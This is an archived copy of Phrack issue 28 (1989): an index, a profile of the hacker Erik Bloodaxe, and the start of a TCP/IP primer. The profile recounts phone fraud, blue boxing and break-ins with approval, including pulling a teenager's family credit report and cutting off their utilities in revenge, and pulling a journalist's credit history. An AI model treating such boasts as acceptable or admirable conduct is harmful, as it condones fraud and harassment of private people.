home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / zines / phrack / phrack28.txt < prev    next >
Text File  |  1995-11-30  |  232KB  |  4,901 lines

  1.  
  2.                                 ==Phrack Inc.==
  3.  
  4.                      Volume Three, Issue 28, File #1 of 12
  5.  
  6.                    Phrack Inc. Newsletter Issue XXVIII Index
  7.                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8.                                 October 7, 1989
  9.  
  10.  
  11.      Greetings and welcome to Issue 28 of Phrack Inc.  We really
  12. must apologize for the lateness of this issue, but sorting
  13. through all of the files sent in from over the entire summer as
  14. well as our own real life responsibilities have been keeping us
  15. both rather busy.
  16.  
  17.      This issue we feature Phrack World News Special Edition III.
  18. This file contains the exclusive coverage of SummerCon '89, which
  19. took place in St. Louis, Missouri on June 22-25, 1989.
  20.  
  21.      The Future Transcendent Saga continues in this issue with
  22. part one of a file about TCP/IP.  We also present to you the
  23. beginning of a new irregular column called Network Miscellany by
  24. Taran King.  Its exactly what it says it is -- interesting and
  25. important changes in, and tips about using, the Internet.  It
  26. will contain different material each issue it is presented in to
  27. keep pace with the always changing wide area networks.  Speaking
  28. of irregular columns, Phrack Pro-Phile returns this issue with a
  29. detailed look at Erik Bloodaxe of LOD.
  30.  
  31.      As always, we ask that anyone with network access drop us a
  32. line to either our Bitnet or Internet addresses...
  33.  
  34.                Taran King                        Knight Lightning
  35.           C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
  36.        C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
  37.  
  38. And now we can also be reached via our new mail forwarding
  39. addresses (for those that cannot mail to our Bitnet or Internet
  40. addresses):
  41.  
  42.                ...!netsys!phrack      or      phrack@netsys.COM
  43. _______________________________________________________________________________
  44.  
  45. Table of Contents:
  46.  
  47. 1.  Phrack Inc. XXVIII Index by Taran King and Knight Lightning
  48. 2.  Phrack Pro-Phile XXVIII on Erik Bloodaxe by Taran King
  49. 3.  Introduction to the Internet Protocols:  Chapter Eight of the FTS by KL
  50. 4.  Network Miscellany by Taran King
  51. 5.  A Real Functioning PEARL BOX Schematic by Dispater
  52. 6.  Snarfing Remote Files by Dark OverLord
  53. 7.  Other Common Carriers; A List By Equal Axis
  54. 8.  Phrack World News Special Edition III (SummerCon '89) by Knight Lightning
  55. 9-12 Phrack World News XXVIII/Parts 1-4 by Knight Lightning
  56. _______________________________________________________________
  57.  
  58.                                 ==Phrack Inc.==
  59.  
  60.                      Volume Three, Issue 28, File #2 of 12
  61.  
  62.                           ==Phrack Pro-Phile XXVIII==
  63.  
  64.                        Created and Written by Taran King
  65.  
  66.                           Done on September 23, 1989
  67.  
  68.          Welcome to Phrack Pro-Phile XXVIII.  Phrack Pro-Phile
  69. was created to bring information to you, the community, about
  70. retired or highly important/ controversial people.  This issue,
  71. we bring you a long time member of the hacking community and a
  72. charter member of the Legion Of Doom...
  73.  
  74.                                  Erik Bloodaxe
  75.                                  ~~~~~~~~~~~~~
  76.        Handle:  Erik Bloodaxe
  77.      Call Him:  Chris
  78. Handle Origin:  "Vikings" by ? (Don't remember)
  79. Date Of Birth:  20 years ago
  80.   Current Age:  20
  81.        Height:  5' 10"
  82.        Weight:  130
  83.     Eye Color:  Blue
  84.    Hair Color:  Brown
  85.    Blood Type:  A+
  86.   Sperm Count:  3
  87.     Computers:  Atari 400, various dumb terminals, CompuAdd Turbo XT
  88.  
  89. Origins in Phreak/Hack World
  90. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  91. Way back when he was in 7th grade, some 8+ years back, Erik was
  92. quite a shoplifter.  As was the norm for 13 year-olds, he and a
  93. friend of his had stolen a stack of "girlie" magazines on one of
  94. their "raids."  One of these was High Society, which was toying
  95. with the idea of "recorded entertainment."  His friend was
  96. determined to hear this, but as the number was in New York, they
  97. decided to use the "strange phone service" his mother had signed
  98. up for to keep down the bill.  He explained it to Erik, "You dial
  99. this number and then tell the operator your number and the phone
  100. number."  They called it and told the operator a number that was
  101. 100 off by mistake.  The operator said "Thank you," and the call
  102. went through.  Thus was born a "code-abuser."  They kept this
  103. information to themselves for several months.  When the service
  104. changed to an automated format (rather than operator service),
  105. they began to share their knowledge.  Word spread like wildfire.
  106. Interestingly enough, to this day, he can still backtrack 95% of
  107. all hacker-related code abuse from San Antonio back to himself as
  108. the originator of the information (well, a friend of a friend of
  109. a friend, etc..)
  110.  
  111. Origins in Phreak/Hack BBSes
  112. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  113. A friend of Bloodaxe's father bought a MicroModem II to get
  114. information from Dialog for his legal practice.  He still
  115. remembers the first time he used it.  His friend's dad used
  116. Dialog through Telenet.  Once he saw Telenet, he began trying
  117. various addresses.  One of the first things he ever did was get
  118. into a 212 VAX/VMS with GUEST/GUEST.  Erik had absolutely no idea
  119. what he was doing.  They were just guessing... typing things like
  120. "hello?", "catalog", and assorted other inane things.  They also
  121. called a few BBSes that came with the modem instructions (using
  122. their long-distance trick).  By the end of the weekend, they had
  123. worked their way to Pirates' Harbor (now TIMECOR) in 617, and
  124. Pirates' Cove 516.  From then on, he was hooked on modems.  Then,
  125. Wargames came out.  Embarrassing as it is for Erik, Wargames
  126. really did play a part in imbedding the idea of computer
  127. "hacking" in his little head.  (As it did for hundreds of others
  128. who are too insecure to admit it.)  He had his little Atari 400,
  129. but no modem (Hayes 300's were still hundreds of dollars).
  130. Another friend got an Atari Acoustic Coupler for his 800.  Born
  131. now were the Atari Warez D00dz.  For about a year, they did
  132. nothing but call Atari BBSes (and anything that had "Pirate" in
  133. its name).  They did stumble onto things like the Phone Booth in
  134. 303, OSUNY (on an OHIO Scientific, days before it went down), and
  135. Mines of Moria (713).  Finally, he got an MPP modem.  Bloodaxe
  136. was on it day and night.  By this time they got into scanning.
  137. He was the one who checked everything out, as he was the one who
  138. was reading up on computer OSes at the UTSA library.  They were
  139. still big into games, and they ran across a really new game
  140. called Behind Jaggi Lines.  A guy named Devious Xevious traded
  141. them something called Software Blue Box for it, and gave them a
  142. BBS to call:  Pirate-80.  In 1983, Erik Bloodaxe entered the
  143. hack/phreak world.  He was blue boxing most of his calls by then.
  144.  
  145.  
  146. People in the Phreak/Hack World Met
  147. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  148. Bloodaxe has only met a handful "face-to-face," but has spoken
  149. with almost everyone around in the "golden-years," as he was
  150. heavily into conferences.
  151.  
  152.  
  153. Experience Gained In the Following Ways
  154. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  155. Mainly trial and error.  He would find a system, try to get in
  156. with simplistic username/password pairs, and then read help.  He
  157. also reads a lot.  He didn't speak out until he was sure of what
  158. he was talking about.  Erik never asked any questions, but always
  159. listened.  During the time he was a true "novice," he kept it
  160. fairly hidden, because he didn't want to seem stupid.
  161.  
  162. Chris attributes the knowledge he has gained to himself.
  163.  
  164.  
  165. Memorable Phreak/Hack BBSes
  166. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  167. Pirate-80  (He still call to check in on Scott)
  168. Sherwood Forest I, II, III
  169. RACS III (Tuc wouldn't let him on until years after he first called!!)
  170. Plovernet (Before and after the move)
  171. COPS (Where he got mail from Lex telling him to call Legion of Doom)
  172. WOPR (Getting closer to what BBSes would become)
  173. Hacknet (217)
  174. Legion of Doom (The ultimate in BBSes at the time)
  175. Crystal Palace (OSUNY lives again!)
  176. Newsnet (Yes, Sir Knight's BBS)
  177. Blottoland (Lair of the rodents)
  178. Ripco (A looooooong time ago, certainly not now)
  179. The Broadway Show ("Well, Mike was a little off, but so what.")
  180. Farmers of Doom! (Run from a pay phone, complete chaos)
  181. The Connection (A good private BBS)
  182. Catch-22 (A "better" private BBS)
  183. The Pipeline (718)
  184. Freeworld II
  185. Executive Inn (Re-instilled his faith in BBSes)
  186. The Phoenix Project (What he would want his BBS to equal or
  187. surpass in quality)
  188. Black Ice (A big leak; ask anyone at the Ameritech security
  189. convention)
  190. Pure Nihilism (Too much fun!)
  191.  
  192.  
  193. Schooling/Work
  194. ~~~~~~~~~~~~~~
  195. Chris is currently struggling as a Computer Science major at
  196. University of Texas in Austin with intentions of a PhD,
  197. specializing in AI research.
  198.  
  199.  
  200. Accomplishments
  201. ~~~~~~~~~~~~~~~
  202. Project Educate:  Was supposed to replace TAP after Tuc got fed
  203.                   up.  No one really knows what happened to it.
  204.  
  205. LOD/H TJ:         Assorted work, major distributor.
  206.  
  207. Numerous files.
  208.  
  209.  
  210. Phreak/Hack Groups
  211. ~~~~~~~~~~~~~~~~~~
  212. LOD - In the original recruitment group, still in, still active.
  213.       What more can be said?  "LOD!" basically sums it all up.
  214.  
  215. Camorra - Erik still gets mad about this.  He was asked by the
  216.           602 Scorpion to join a group that was being formed.  He
  217.           agreed, and he then came up with Camorra as a name.
  218.           The other members were Ax Murderer and 301 Executioner.
  219.           He got Dr. Who, Silver Sabre, and Pit Fiend to join and
  220.           Karl Marx, Tuc, and Videosmith were kind of
  221.           in/out-not-really-into-groups-but-we'll-hang-out kind
  222.           of members.  Most of them were deep into their
  223.           phones/computers.  They were planning a series of
  224.           files, such as the first Tymnet directory, a great
  225.           COSMOS file, a database of scans, etc.  Suddenly people
  226.           began appearing in the group that no one voted on.  The
  227.           group kind of split up into two factions, "us and
  228.           them."  Bloodaxe and Dr. Who just got mad and blew it
  229.           all off.  Pit Fiend got busted, and the Scorpion
  230.           disappeared.
  231.  
  232.  
  233. Interests
  234. ~~~~~~~~~
  235. Packet networks (all), telco computers, Unixes, scanning (every night for
  236. almost 5 years!)
  237.  
  238.  
  239. Favorite Things
  240. ~~~~~~~~~~~~~~~
  241. Beer--Tsing Tao, Michelob Dry, Coors Light.  (He am in college, you know!)
  242. Ecstasy--Grinding away (His teeth and his mind).
  243. Getting into a system on the first try.
  244. Unprotected crontab files.
  245. Scanning.  Anything, for anything, just doing it!
  246. A certain shapely 5'2" blonde who shall remain nameless.
  247.  
  248.  
  249. Most Memorable Experiences
  250. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  251. Alliance Teleconferencing way back when.  Tandem scanning out
  252. other sites in Houston and Dallas.  Transferring control to
  253. directory assistance ACD loops, and leaving it there until he
  254. wanted to run one.  Waking up the next morning and yelling into
  255. the phone at everyone else who had stayed on the conference and
  256. starting to talk again.  Conferences that lasted a week.
  257. Catching Draper in lies.  Busying out all the 408 DA's.  Boxing
  258. on a conference and trunking Karl Marx.  Calling random numbers
  259. in California and adding them in if they sounded like teenage
  260. girls.  "Giving" people unlimited trial usage of a "new" long
  261. distance service (LOD Telecommunications).  Jennifer, the
  262. Alliance operator who had it out for him ("This is that
  263. Bloody-axe person isn't it?").
  264.  
  265. The Wharton School of Business Dec-10.  For nearly a month all
  266. the nation's top phreaks and hackers hung out on this system and
  267. used the chat program.  It was "the" place to be (kind of like an
  268. Altger Altos of the past, but no idiots).  Finally they killed
  269. the account, not because of abuse, but because they were loading
  270. the system down.  The students and operators were really cool
  271. about the whole thing.
  272.  
  273. Finding (and spreading around everywhere) the White House Signal
  274. number.  A number of my friends kept calling it, posing as the
  275. mayor of San Antonio, Henry Cisneros, eventually causing the
  276. Secret Service call our high school, and telling the
  277. administrators to grab the people using the payphone to find out
  278. what the hell they were trying to do.
  279.  
  280. Taking down almost every BBS in Alaska when he was denied access
  281. to one.  He pulled the poor kid's parents credit report, sent a
  282. copy to the kid over his modem, and disconnected the kid's phone,
  283. electricity, and water.  He then went around taking down the
  284. BBSes where the kid had friends (guilt by association).  Word got
  285. around the nation kind of fast.  Erik got on most BBSes without
  286. much trouble after all that.  He had a project to be on at least
  287. one BBS in every area code.  Bloodaxe had to get on
  288. non-hack/pirate ones in a few areas, but he managed to do it.  He
  289. stayed active on all of them for several months.  At one time, he
  290. was on about 140 BBSes!!!
  291.  
  292. Reading a new edition of Newsweek with a story by Richard Sandza
  293. in it over a very crowded conference, then suggesting that he
  294. should get some Slim Whitman albums and Civil War Chess Sets via
  295. his Visa.  Erik pulled his history, to scare him, but lost it.
  296. When he pulled it later, there were nearly 100 inquiries, most by
  297. a certain Massachusetts Bank.  At least they gave him a good
  298. source for a follow-up article.
  299.  
  300. Finding out that a certain long distance service (reselling AT&T
  301. WATS) would reset to a WATS dialtone when 2600 was blasted and
  302. then setting up a program to call MTV's 900 number repeatedly to
  303. ensure that Duran Duran would get severely beaten.
  304.  
  305. Bloodaxe remembers boxing up a conference while waiting for the
  306. police to come, and fighting the impulse to run away.  He had
  307. tickets carded to Philadelphia International on a flight that
  308. afternoon (on the conference), and Telenet Bob was ready to meet
  309. Erik's flight, Mark Tabas was ready to send him a blank birth
  310. certificate, not to mention offers to stay with Dr. Who or
  311. Telenet Bob for as long as he needed to get settled.  Karl Marx
  312. talked him out of it though.  He was packed and ready to leave
  313. and become a new person in a new city.  Looking back, he's DAMN
  314. glad he didn't do it!
  315.  
  316. Bloodaxe and Who-Bob deciding one fateful day to see if they
  317. could talk to each other's port on Telenet using an ID they had
  318. used for the LOD Telenet directory.
  319.  
  320.  
  321. Some People to Mention
  322. ~~~~~~~~~~~~~~~~~~~~~~
  323. Dr. Who -- "My closest hacker counterpart.  We joke about being
  324.            60 with grandchildren, still having never met, calling
  325.            each other daily, with stories about how we just
  326.            defeated some ISDN service."
  327.  
  328. The Mentor -- "My favorite drinking buddy.  The first hacker I
  329.               ever met face-to-face."
  330.  
  331. Control C -- "One person who can almost equal me in outrageous
  332.               behavior.  Yes, Dan, I said almost!  Nyahh Nyahh!"
  333.  
  334.  
  335. Inside Jokes
  336. ~~~~~~~~~~~~
  337. Lame, Lame, Lame
  338.  
  339. LEGION OF DOOM IN DALLAS...FEDS BAFFLED
  340.  
  341.  
  342. Serious Section
  343. ~~~~~~~~~~~~~~~
  344. Chris makes it a point to make huge filibusters on boards where
  345. he sees anything having even anything remotely related to
  346. carding.  Credit card fraud truly gives hacking a bad name.
  347. Snooping around a VAX is just electronic voyeurism... carding a
  348. new modem is just flat out blue-collar crime.  It's just as bad
  349. as breaking into a house or kicking a puppy!  He does everything
  350. he can (even up to turning off a number) to get credit
  351. information taken off a BBS.  He also tries to remove codes from
  352. BBSes.  He doesn't see code abuse in the same light as credit
  353. card fraud, (although the law does), but posted codes are the
  354. quickest way to get your board busted, and your computer
  355. confiscated.  People should just find a local outdial to wherever
  356. they want to call and use that.  If you only make local calls
  357. from an outdial, it will never die, you will keep out of trouble,
  358. and everyone will be happy.
  359.  
  360. Marijuana, cocaine, LSD, MDMA (& analogs), and methamphetamine
  361. should be legalized and sold in a controlled fashion, regulated
  362. by the government.  Money spent currently on combatting drug
  363. traffic should be spent on the deficit, and on drug education and
  364. rehabilitation.  Making petty vices illegal only breeds crime;
  365. look at prohibition, look at gambling, look at how fast people go
  366. on the highway.  You cannot fight a losing battle, and therefore,
  367. must take on a new strategy.  Alcohol is the only drug he has
  368. ever imbibed and lost all consciousness and complete control of
  369. his actions.  He thinks it is THE most dangerous drug around, and
  370. anyone can get as much of it as they want with very little
  371. effort.  It is legal, but not everyone drinks.  If marijuana was
  372. legal not everyone would smoke it.  He wouldn't for one; he hates
  373. it.  However, farmers would no longer lose their farms; and most
  374. importantly, the economy would be boosted greatly.  Things have
  375. got to change.
  376.  
  377.  
  378. Are Phreaks/Hackers You've Met Generally Computer Geeks?
  379. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  380. Of course not.  There are some that are, but generally there is
  381. an average sampling of the general population.  Hacking is just
  382. another hobby.  Most people who collect comic books are not all
  383. the same, most people who play backgammon are not similar in
  384. physical characteristics either.  The closest stereotype he could
  385. ever even say existed was 6 or so years ago, and that would be
  386. that most hackers then were Jewish and from New York state.  An
  387. obnoxious Texan WASP like Chris really stood out.
  388.  
  389.  
  390. Thanks for your time, Chris.
  391.  
  392.                                                    Taran King
  393. ________________________________________________________________
  394.  
  395.                                 ==Phrack Inc.==
  396.  
  397.                      Volume Three, Issue 28, File #3 of 12
  398.  
  399.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  400.        <>                                                            <>
  401.        <>           Introduction to the Internet Protocols           <>
  402.        <>           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~           <>
  403.        <>        Chapter Eight Of The Future Transcendent Saga       <>
  404.        <>                                                            <>
  405.        <>                    Part One of Two Files                   <>
  406.        <>                                                            <>
  407.        <>                Presented by Knight Lightning               <>
  408.        <>                        July 3, 1989                        <>
  409.        <>                                                            <>
  410.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  411.  
  412.  
  413. Prologue
  414. ~~~~~~~~
  415. Much of the material in this file comes from "Introduction to the
  416. Internet Protocols" by Charles L. Hedrick of Rutgers University.
  417. That material is copyrighted and is used in this file by
  418. permission.  Time differention and changes in the wide area
  419. networks have made it necessary for some details of the file to
  420. updated and in some cases reworded for better understanding of
  421. our readers.  Also, Unix is a trademark of AT&T Technologies,
  422. Inc. -- Just thought I'd let you know.
  423.  
  424. If you are not already familiar with TCP/IP, I would suggest that
  425. you read "Introduction to MIDNET" (Phrack Inc., Volume Three,
  426. Issue 27, File 3 of 12) for more information.  That file is
  427. Chapter Seven of The Future Transcendent Saga and contains
  428. information about TCP/IP and how it is used within the National
  429. Science Foundation Network (NSFnet).
  430.  
  431.  
  432. Table of Contents - Part One
  433. ~~~~~~~~~~~~~~~~~
  434. *  Introduction
  435. *  What Is TCP/IP?
  436. *  General Description Of The TCP/IP Protocols
  437.        The TCP Level
  438.        The IP Level
  439.        The Ethernet Level
  440.  
  441.  
  442. Introduction
  443. ~~~~~~~~~~~~
  444. This article is a brief introduction to TCP/IP, followed by
  445. suggestions on what to read for more information.  This is not
  446. intended to be a complete description, but it can give you a
  447. reasonable idea of the capabilities of the protocols.  However,
  448. if you need to know any details of the technology, you will want
  449. to read the standards yourself.
  450.  
  451. Throughout the article, you will find references to the
  452. standards, in the form of "RFC" (Request For Comments) or "IEN"
  453. (Internet Engineering Notes) numbers -- these are document
  454. numbers.  The final section (in Part Two) explains how you can
  455. get copies of those standards.
  456.  
  457.  
  458. What Is TCP/IP?
  459. ~~~~~~~~~~~~~~~
  460. TCP/IP is a set of protocols developed to allow cooperating
  461. computers to share resources across a network.  It was developed
  462. by a community of researchers centered around the ARPAnet.
  463.  
  464. First some basic definitions; The most accurate name for the set
  465. of protocols I am describing is the "Internet protocol suite."
  466. TCP and IP are two of the protocols in this suite (they will be
  467. described below).  Because TCP and IP are the best known of the
  468. protocols, it has become common to use the term TCP/IP to refer
  469. to the whole family.
  470.  
  471. The Internet is a collection of networks, including the Arpanet,
  472. NSFnet, regional networks such as MIDnet (described in Chapter
  473. Seven of the Future Transcendent Saga), local networks at a
  474. number of University and research institutions, and a number of
  475. military networks.  The term "Internet" applies to this entire
  476. set of networks.
  477.  
  478. The subset of them that is managed by the Department of Defense
  479. is referred to as the "DDN" (Defense Data Network).  This
  480. includes some research-oriented networks, such as the ARPAnet, as
  481. well as more strictly military ones (because much of the funding
  482. for Internet protocol developments is done via the DDN
  483. organization, the terms Internet and DDN can sometimes seem
  484. equivalent).
  485.  
  486. All of these networks are connected to each other.  Users can
  487. send messages from any of them to any other, except where there
  488. are security or other policy restrictions on access.  Officially
  489. speaking, the Internet protocol documents are simply standards
  490. adopted by the Internet community for its own use.  The
  491. Department of Defense once issued a MILSPEC definition of TCP/IP
  492. that was intended to be a more formal definition, appropriate for
  493. use in purchasing specifications.  However most of the TCP/IP
  494. community continues to use the Internet standards.  The MILSPEC
  495. version is intended to be consistent with it.
  496.  
  497. Whatever it is called, TCP/IP is a family of protocols.  A few
  498. provide "low-level" functions needed for many applications.
  499. These include IP, TCP, and UDP (all of which will be described in
  500. a bit more detail later in this file).  Others are protocols for
  501. doing specific tasks, e.g. transferring files between computers,
  502. sending mail, or finding out who is logged in on another
  503. computer.
  504.  
  505. Initially TCP/IP was used mostly between minicomputers or
  506. mainframes.  These machines had their own disks, and generally
  507. were self-contained.  Thus the most important "traditional"
  508. TCP/IP services are:
  509.  
  510.     - File Transfer -- The file transfer protocol (FTP) allows a
  511.       user on any computer to get files from another computer, or
  512.       to send files to another computer.  Security is handled by
  513.       requiring the user to specify a user name and password for
  514.       the other computer.
  515.  
  516.       Provisions are made for handling file transfer between
  517.       machines with different character set, end of line
  518.       conventions, etc.  This is not quite the same as "network
  519.       file system" or "netbios" protocols, which will be
  520.       described later.  Instead, FTP is a utility that you run
  521.       any time you want to access a file on another system.  You
  522.       use it to copy the file to your own system.  You then can
  523.       work with the local copy.  (See RFC 959 for specifications
  524.       for FTP.)
  525.  
  526.     - Remote Login -- The network terminal protocol (TELNET)
  527.       allows a user to log in on any other computer on the
  528.       network.  You start a remote session by specifying a
  529.       computer to connect to.  From that time until you finish
  530.       the session, anything you type is sent to the other
  531.       computer.  Note that you are really still talking to your
  532.       own computer, but the telnet program effectively makes your
  533.       computer invisible while it is running.  Every character
  534.       you type is sent directly to the other system.  Generally,
  535.       the connection to the remote computer behaves much like a
  536.       dialup connection.  That is, the remote system will ask you
  537.       to log in and give a password, in whatever manner it would
  538.       normally ask a user who had just dialed it up.
  539.  
  540.       When you log off of the other computer, the telnet program
  541.       exits, and you will find yourself talking to your own
  542.       computer.  Microcomputer implementations of telnet
  543.       generally include a terminal emulator for some common type
  544.       of terminal.  (See RFCs 854 and 855 for specifications for
  545.       telnet.  By the way, the telnet protocol should not be
  546.       confused with Telenet, a vendor of commercial network
  547.       services.)
  548.  
  549.     - Computer Mail -- This allows you to send messages to users
  550.       on other computers.  Originally, people tended to use only
  551.       one or two specific computers and they would maintain "mail
  552.       files" on those machines.  The computer mail system is
  553.       simply a way for you to add a message to another user's
  554.       mail file.  There are some problems with this in an
  555.       environment where microcomputers are used.
  556.  
  557.       The most serious is that a micro is not well suited to
  558.       receive computer mail.  When you send mail, the mail
  559.       software expects to be able to open a connection to the
  560.       addressee's computer, in order to send the mail.  If this
  561.       is a microcomputer, it may be turned off, or it may be
  562.       running an application other than the mail system.  For
  563.       this reason, mail is normally handled by a larger system,
  564.       where it is practical to have a mail server running all the
  565.       time.  Microcomputer mail software then becomes a user
  566.       interface that retrieves mail from the mail server.  (See
  567.       RFC 821 and 822 for specifications for computer mail.  See
  568.       RFC 937 for a protocol designed for microcomputers to use
  569.       in reading mail from a mail server.)
  570.  
  571. These services should be present in any implementation of TCP/IP,
  572. except that micro-oriented implementations may not support
  573. computer mail.  These traditional applications still play a very
  574. important role in TCP/IP-based networks.  However more recently,
  575. the way in which networks are used has been changing.  The older
  576. model of a number of large, self-sufficient computers is
  577. beginning to change.  Now many installations have several kinds
  578. of computers, including microcomputers, workstations,
  579. minicomputers, and mainframes.  These computers are likely to be
  580. configured to perform specialized tasks.  Although people are
  581. still likely to work with one specific computer, that computer
  582. will call on other systems on the net for specialized services.
  583. This has led to the "server/client" model of network services.  A
  584. server is a system that provides a specific service for the rest
  585. of the network.  A client is another system that uses that
  586. service.  Note that the server and client need not be on
  587. different computers.  They could be different programs running on
  588. the same computer.  Here are the kinds of servers typically
  589. present in a modern computer setup.  Also note that these
  590. computer services can all be provided within the framework of
  591. TCP/IP.
  592.  
  593. -  Network file systems.  This allows a system to access files on
  594.    another computer in a somewhat more closely integrated fashion
  595.    than FTP.  A network file system provides the illusion that
  596.    disks or other devices from one system are directly connected
  597.    to other systems.  There is no need to use a special network
  598.    utility to access a file on another system.  Your computer
  599.    simply thinks it has some extra disk drives.  These extra
  600.    "virtual" drives refer to the other system's disks.  This
  601.    capability is useful for several different purposes.  It lets
  602.    you put large disks on a few computers, but still give others
  603.    access to the disk space.  Aside from the obvious economic
  604.    benefits, this allows people working on several computers to
  605.    share common files.  It makes system maintenance and backup
  606.    easier, because you don't have to worry about updating and
  607.    backing up copies on lots of different machines.  A number of
  608.    vendors now offer high-performance diskless computers.  These
  609.    computers have no disk drives at all.  They are entirely
  610.    dependent upon disks attached to common "file servers".  (See
  611.    RFC's 1001 and 1002 for a description of PC-oriented NetBIOS
  612.    over TCP.  In the workstation and minicomputer area, Sun's
  613.    Network File System is more likely to be used.  Protocol
  614.    specifications for it are available from Sun Microsystems.) -
  615.    remote printing.  This allows you to access printers on other
  616.    computers as if they were directly attached to yours.  (The
  617.    most commonly used protocol is the remote lineprinter protocol
  618.    from Berkeley Unix.  Unfortunately, there is no protocol
  619.    document for this.  However the C code is easily obtained from
  620.    Berkeley, so implementations are common.)
  621.  
  622. -  Remote execution.  This allows you to request that a
  623.    particular program be run on a different computer.  This is
  624.    useful when you can do most of your work on a small computer,
  625.    but a few tasks require the resources of a larger system.
  626.    There are a number of different kinds of remote execution.
  627.    Some operate on a command by command basis.  That is, you
  628.    request that a specific command or set of commands should run
  629.    on some specific computer.  (More sophisticated versions will
  630.    choose a system that happens to be free.) However there are
  631.    also "remote procedure call" systems that allow a program to
  632.    call a subroutine that will run on another computer.  (There
  633.    are many protocols of this sort.  Berkeley Unix contains two
  634.    servers to execute commands remotely:  rsh and rexec.  The
  635.    Unix "man" pages describe the protocols that they use.  The
  636.    user-contributed software with Berkeley 4.3 contains a
  637.    "distributed shell" that will distribute tasks among a set of
  638.    systems, depending upon load.
  639.  
  640. -  Name servers.  In large installations, there are a number of
  641.    different collections of names that have to be managed.  This
  642.    includes users and their passwords, names and network
  643.    addresses for computers, and accounts.  It becomes very
  644.    tedious to keep this data up to date on all of the computers.
  645.    Thus the databases are kept on a small number of systems.
  646.    Other systems access the data over the network.  (RFC 822 and
  647.    823 describe the name server protocol used to keep track of
  648.    host names and Internet addresses on the Internet.  This is
  649.    now a required part of any TCP/IP implementation.  IEN 116
  650.    describes an older name server protocol that is used by a few
  651.    terminal servers and other products to look up host names.
  652.    Sun's Yellow Pages system is designed as a general mechanism
  653.    to handle user names, file sharing groups, and other databases
  654.    commonly used by Unix systems.  It is widely available
  655.    commercially.  Its protocol definition is available from Sun.)
  656.  
  657. -  Terminal servers.  Many installations no longer connect
  658.    terminals directly to computers.  Instead they connect them to
  659.    terminal servers.  A terminal server is simply a small
  660.    computer that only knows how to run telnet (or some other
  661.    protocol to do remote login).  If your terminal is connected
  662.    to one of these, you simply type the name of a computer, and
  663.    you are connected to it.  Generally it is possible to have
  664.    active connections to more than one computer at the same time.
  665.    The terminal server will have provisions to switch between
  666.    connections rapidly, and to notify you when output is waiting
  667.    for another connection.  (Terminal servers use the telnet
  668.    protocol, already mentioned.  However any real terminal server
  669.    will also have to support name service and a number of other
  670.    protocols.)
  671.  
  672. -  Network-oriented window systems.  Until recently,
  673.    high-performance graphics programs had to execute on a
  674.    computer that had a bit-mapped graphics screen directly
  675.    attached to it.  Network window systems allow a program to use
  676.    a display on a different computer.  Full-scale network window
  677.    systems provide an interface that lets you distribute jobs to
  678.    the systems that are best suited to handle them, but still
  679.    give you a single graphically-based user interface.  (The most
  680.    widely-implemented window system is X.  A protocol description
  681.    is available from MIT's Project Athena.  A reference
  682.    implementation is publically available from MIT.  A number of
  683.    vendors are also supporting NeWS, a window system defined by
  684.    Sun.  Both of these systems are designed to use TCP/IP.)
  685.  
  686. Note that some of the protocols described above were designed by
  687. Berkeley, Sun, or other organizations.  Thus they are not
  688. officially part of the Internet protocol suite.  However they are
  689. implemented using TCP/IP, just as normal TCP/IP application
  690. protocols are.  Since the protocol definitions are not considered
  691. proprietary, and since commercially-supported implementations are
  692. widely available, it is reasonable to think of these protocols as
  693. being effectively part of the Internet suite.
  694.  
  695. Note that the list above is simply a sample of the sort of
  696. services available through TCP/IP.  However it does contain the
  697. majority of the "major" applications.  The other commonly-used
  698. protocols tend to be specialized facilities for getting
  699. information of various kinds, such as who is logged in, the time
  700. of day, etc.  However if you need a facility that is not listed
  701. here, I encourage you to look through the current edition of
  702. Internet Protocols (currently RFC 1011), which lists all of the
  703. available protocols, and also to look at some of the major TCP/IP
  704. implementations to see what various vendors have added.
  705.  
  706.  
  707. General Description Of The TCP/IP Protocols
  708. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  709. TCP/IP is a layered set of protocols.  In order to understand
  710. what this means, it is useful to look at an example.  A typical
  711. situation is sending mail.  First, there is a protocol for mail.
  712. This defines a set of commands which one machine sends to
  713. another, e.g. commands to specify who the sender of the message
  714. is, who it is being sent to, and then the text of the message.
  715. However this protocol assumes that there is a way to communicate
  716. reliably between the two computers.  Mail, like other application
  717. protocols, simply defines a set of commands and messages to be
  718. sent.  It is designed to be used together with TCP and IP.
  719.  
  720. TCP is responsible for making sure that the commands get through
  721. to the other end.  It keeps track of what is sent, and
  722. retransmitts anything that did not get through.  If any message
  723. is too large for one datagram, e.g. the text of the mail, TCP
  724. will split it up into several datagrams, and make sure that they
  725. all arrive correctly.  Since these functions are needed for many
  726. applications, they are put together into a separate protocol,
  727. rather than being part of the specifications for sending mail.
  728. You can think of TCP as forming a library of routines that
  729. applications can use when they need reliable network
  730. communications with another computer.
  731.  
  732. Similarly, TCP calls on the services of IP.  Although the
  733. services that TCP supplies are needed by many applications, there
  734. are still some kinds of applications that don't need them.
  735. However there are some services that every application needs.  So
  736. these services are put together into IP.  As with TCP, you can
  737. think of IP as a library of routines that TCP calls on, but which
  738. is also available to applications that don't use TCP.  This
  739. strategy of building several levels of protocol is called
  740. "layering."  I like to think of the applications programs such as
  741. mail, TCP, and IP, as being separate "layers," each of which
  742. calls on the services of the layer below it.  Generally, TCP/IP
  743. applications use 4 layers:
  744.  
  745. - An application protocol such as mail.
  746.  
  747. - A protocol such as TCP that provides services need by many
  748. applications.
  749.  
  750. - IP, which provides the basic service of getting datagrams to
  751.   their destination.
  752.  
